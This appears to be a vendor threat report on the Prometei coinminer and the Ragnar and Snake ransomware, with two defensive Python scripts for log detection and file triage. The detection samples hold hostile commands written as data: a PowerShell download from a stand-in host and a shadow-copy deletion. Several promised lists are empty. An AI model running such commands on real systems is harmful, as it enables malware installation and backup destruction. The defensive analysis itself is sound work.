Coinminer botnet exploits SMB: Coinminer/Prometei

A new coinminer variant, dubbed Prometei, has been in the wild since March this year, earning money for the attacker by mining the Monero cryptocurrency on infected Windows machines.

It spreads by copying botnet binaries from other infected systems over Windows SMB (Server Message Block), using passwords retrieved with Mimikatz (an open-source tool that extracts and displays authentication credentials) and EternalBlue (an exploit that allows threat actors to remotely execute arbitrary code and gain access to a network by sending specially crafted packets). The malware also steals administrator credentials and sends them to the attackers, who could use them in future attacks.

After gaining SMB access by brute forcing passwords, the malware executes a PowerShell script that downloads binary files and saves them in the C:\windows\dell\ directory.

On execution, the malware binary checks whether the directory C:\windows\dell\ exists and creates it if it does not. It also checks for the existence of a service named UPlugPlay before copying itself to “c:\windows\svchost.exe” and registering a service (command line) under the name UPlugPlay that points at the copied binary. It then connects to the attacker's CnC server over RC4-encrypted HTTP. The RC4 key used for encryption is generated uniquely for every machine and shared with the attacker's CnC server.

The malware collects the following information from the infected system and sends it to the attacker:

  • Machine name
  • Processor name
  • Memory size
  • System model
  • Domain name
  • OS Installation date
  • OS Serial number

It then waits for commands from the CnC server, allowing the attacker to remotely control the infected machines. The commands and the actions the malware performs are:

It executes the Mimikatz tool to steal credentials. The stolen credentials are used to spread the malware to other machines via the SMB protocol, and it uses the psexec tool to remotely execute the malware copied via SMB on those machines. If the attempt to copy files over SMB fails, it uses EternalBlue to exploit and spread.

It downloads and executes XMRig, an open-source Monero CPU miner. The attacker can control the miner via commands issued to the backdoor module.

Arctos Networks detects the malware as Coinminer/Prometei.

If you find traces of this malware in your IT infrastructure, you can contact our technical response team to remove the threat from your network.

Ragnar locks your files

Ragnar ransomware affects devices running Microsoft Windows operating systems. It was initially observed in November 2019 as part of a series of attacks against compromised networks. The cybercriminals behind Ragnar claimed to have stolen 10 TB of data from Energias de Portugal (EDP), demanding a payment of $11 million.

Technical details

The ransomware does not execute its payload on Windows machines whose language is one of the following: Azerbaijani, Belorussian, Georgian, Kyrgyz, Kazakh, Russian, Ukrainian, Moldavian, Turkmen, Uzbek and Tajik.

It collects the GUID, OS (product) name, logged-in user name and machine name from the infected system.

This information is used to create an event that prevents a duplicate instance of the malware running on the same machine. It then stops the following services on the machine:

  • Sophos (Sophos Antivirus)
  • Veeam (Veeam Backup)
  • Backup (Asus WebStorage)
  • Pulseway (Pulseway remote control)
  • Logme (Logme remote control software)
  • Logmein (Logmein remote control software)
  • ConnectWise (ConnectWise remote control software)
  • Splashtop (Splashtop remote control software)

It also stops the services on which the services listed above depend. After stopping the services, the malware terminates the following processes:

The malware deletes shadow copies using the wmic (Windows Management Instrumentation Command-line) tool. Shadow Copy is a technology included in Microsoft Windows that creates backup copies or snapshots of files or volumes, even while they are in use.
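The host behaviours described for Prometei (PowerShell drops into C:\windows\dell\, a service named UPlugPlay, a copy of svchost.exe outside System32) and the shadow copy deletion just described for Ragnar are all visible in process-creation telemetry. The following is an added example (not code from the report or from either malware family) that runs simple detection rules over constructed Sysmon-style log lines; the log format and the rule names are assumptions for illustration.

```python
import re

# Constructed process-creation events in a simplified "Image=... CommandLine=..." form.
# These are illustrative lines, not real telemetry from an infected host.
SAMPLE_EVENTS = [
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -c (New-Object Net.WebClient).DownloadFile("http://example.invalid/x.exe","C:\windows\dell\x.exe")',
    r'Image=C:\Windows\System32\sc.exe CommandLine=sc create UPlugPlay binPath= C:\windows\svchost.exe start= auto',
    r'Image=C:\windows\svchost.exe CommandLine=C:\windows\svchost.exe',
    r'Image=C:\Windows\System32\svchost.exe CommandLine=svchost.exe -k netsvcs',
    r'Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic shadowcopy delete',
    r'Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe notes.txt',
]

# Command-line rules derived from indicators in the report (rule names are hypothetical).
RULES = [
    ("prometei_dropper_dir", re.compile(r"c:\\windows\\dell\\", re.I)),
    ("prometei_service_name", re.compile(r"\bUPlugPlay\b", re.I)),
    ("ragnar_shadowcopy_delete", re.compile(r"\bwmic\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
]

EVENT_RX = re.compile(r"Image=(?P<image>\S+) CommandLine=(?P<cmd>.*)$")


def parse_event(line):
    """Split one constructed event line into (image path, command line), or None."""
    m = EVENT_RX.match(line)
    return (m.group("image"), m.group("cmd")) if m else None


def svchost_outside_system32(image):
    """The legitimate svchost.exe lives in System32/SysWOW64; any other location is suspicious."""
    parts = image.lower().replace("/", "\\").split("\\")
    if len(parts) < 2 or parts[-1] != "svchost.exe":
        return False
    return parts[-2] not in ("system32", "syswow64")


def match_rules(line):
    """Return the list of rule names that fire on a single event line."""
    parsed = parse_event(line)
    if parsed is None:
        return []
    image, cmd = parsed
    hits = [name for name, rx in RULES if rx.search(cmd)]
    if svchost_outside_system32(image):
        hits.append("svchost_outside_system32")
    return hits


def scan(lines):
    """Map event index -> fired rules, keeping only events that triggered something."""
    return {i: hits for i, line in enumerate(lines) if (hits := match_rules(line))}
```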

It enumerates the files and directories in the logical drives of the machine.

It skips enumerating files in directories with the following names:

It also skips encrypting files with the following filenames and extensions:

It also skips files that end with the string _RAGNAR_.

The ransomware decodes a base64-encoded PEM key, which is used to protect the cryptographic keys used for encrypting (locking) files. With this key it encrypts two keys generated from system-specific information.

It uses the Salsa20 algorithm to encrypt (lock) the contents of the files.

The encrypted file contents are saved in files with the extension .ragnar_<8-digit custom hash of the system name>.

It decrypts the ransom notes and shows them by launching Notepad.

Arctos Networks detects the malware as Ransomware/Ragnar.

If you find traces of this malware in your IT infrastructure, you can contact our technical response team to remove the threat from your network.

Snake bites Honda motors: Ransomware/Snake

Snake ransomware has been in the wild targeting industrial control systems (ICS) since December 2019. Interestingly, this malware is written in the Go programming language and implements obfuscation techniques to a certain extent. It hit the Honda Motor network, disrupting manufacturing in 9 factories in the United States. The malware encrypted critical files on essential systems, rendering them unusable. Snake terminates several processes related to endpoint security, ICS, visualization, remote administration, network management, etc.

Technical details

The ransomware creates a mutex named “EKANS” (snake spelled backwards) to avoid running duplicate instances on the victim's computer. If the mutex creation fails (it already exists), the ransomware does not lock the files on the machine.

It terminates the following processes on infected systems:

One third of the processes it terminates are related to industrial control systems (ICS).

The malware avoids encrypting files inside the following directories:

  • %SystemDrive%\AppData
  • %SystemDrive%\Boot
  • %SystemDrive%\Windows
  • %SystemDrive%\$Recycle.Bin
  • %SystemDrive%\ProgramData
  • %SystemDrive%\Program Files
  • %SystemDrive%\System Volume Information

The malware tries to resolve a domain that is hard-coded in the binary.

The DNS details of the domain are:

The malware appends the string EKANS to the end of every locked (encrypted) file. It creates a file named Fix-Your-Files.txt on the desktop containing the ransom note.
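Both families leave file-level artifacts a responder can sweep for: Ragnar's .ragnar_<hash> extension and _RAGNAR_ trailer, and Snake's EKANS trailer plus the Fix-Your-Files.txt note. The following is an added triage script (not code from the report or from either malware) that walks a directory tree and classifies files by those artifacts; it assumes the 8-digit Ragnar hash is hexadecimal and builds its own constructed sample files so it runs offline.

```python
import os
import re
import tempfile

RAGNAR_EXT = re.compile(r"\.ragnar_[0-9a-f]{8}$", re.I)  # assumption: 8-digit hash is hex
RAGNAR_TRAILER = b"_RAGNAR_"   # files the malware skips, i.e. already processed
EKANS_TRAILER = b"EKANS"       # appended to every file Snake encrypts
SNAKE_NOTE = "fix-your-files.txt"


def classify_file(path):
    """Return an artifact label for one file, or None if nothing matches."""
    name = os.path.basename(path)
    if name.lower() == SNAKE_NOTE:
        return "snake_ransom_note"
    try:
        with open(path, "rb") as f:       # read only the last 16 bytes: enough for both trailers
            f.seek(0, os.SEEK_END)
            f.seek(max(0, f.tell() - 16))
            tail = f.read()
    except OSError:
        return None
    if RAGNAR_EXT.search(name):
        return "ragnar_encrypted"
    if tail.endswith(RAGNAR_TRAILER):
        return "ragnar_marker"
    if tail.endswith(EKANS_TRAILER):
        return "snake_encrypted"
    return None


def triage(root):
    """Walk root and map relative path -> label for every file that shows an artifact."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            label = classify_file(p)
            if label:
                findings[os.path.relpath(p, root).replace(os.sep, "/")] = label
    return findings


def build_sample_tree():
    """Constructed sample files with dummy bytes (not real samples) for a self-contained run."""
    root = tempfile.mkdtemp(prefix="triage_")
    os.makedirs(os.path.join(root, "docs"))
    samples = {
        "docs/report.docx.ragnar_1a2b3c4d": b"\x00" * 32,
        "docs/budget.xlsx": b"ciphertext" + RAGNAR_TRAILER,
        "docs/plc_config.bin": b"ciphertext" + EKANS_TRAILER,
        "Fix-Your-Files.txt": b"ransom note text",
        "docs/clean.txt": b"hello world",
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    return root
```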